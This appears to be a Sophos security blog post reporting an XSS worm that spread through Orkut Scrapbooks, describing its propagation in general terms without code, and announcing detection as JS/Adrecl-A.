Large scale Orkut virus outbreak not cool

Although most of the virus attacks these days are financially motivated, old style attacks that attempt to make the attacker look cool and famous still exist.

The most recent example is yesterday’s large scale worm attack on Google’s social networking site Orkut. In an attack reminiscent of some earlier attacks on social networking sites such as MySpace, the author of the worm allegedly wanted to raise awareness about a security flaw in Orkut’s URL parsing. The flaw allowed the attacker to launch a cross-site scripting attack (XSS attack) and execute arbitrary code inside the Orkut environment.

This was a classic XSS attack. The attacker initially created a bogus user and ran code that found the user’s friends and embedded a piece of code into their Scrapbooks (basically a page where other users can leave messages for the Scrapbook’s owner). Orkut notifies the user about the message and when the user visited their Scrapbook the XSS attack was executed. A malicious JavaScript file virus.js was retrieved from a remote site (the page has since been taken offline) and this code run. The worm uses AJAX to retrieve the list of a user’s friends and embed the new message in their Scrapbooks. This style of spreading has a geometric progression (same as email worms of the past) explaining how the threat infected so many user profiles so quickly.

One of the worm payloads is to add the infected user profile to the list of members of “Infectados pelo Virus do Orkut” (Infected by Orkut Virus) community which allowed the author to track number of infected profiles. When last checked there were more than 670,000 members of the community.

Orkut virus community

Regardless of what the author thought about this worm, the fact is that infecting hundreds of thousands of user profiles is not cool and clearly not the way to disclose a vulnerability. The attack shows once again that users should be very careful about posting sensitive information to their profiles (even in their limited profiles) on popular social networking sites such as Orkut, Facebook and MySpace. Previously, Sophos has conducted research and issued best practice guidelines on using Facebook and restricting the information posted to their profiles. The guidelines can easily be applied to any social networking site.

Sophos will be detecting the malicious JavaScript component used by the worm as JS/Adrecl-A.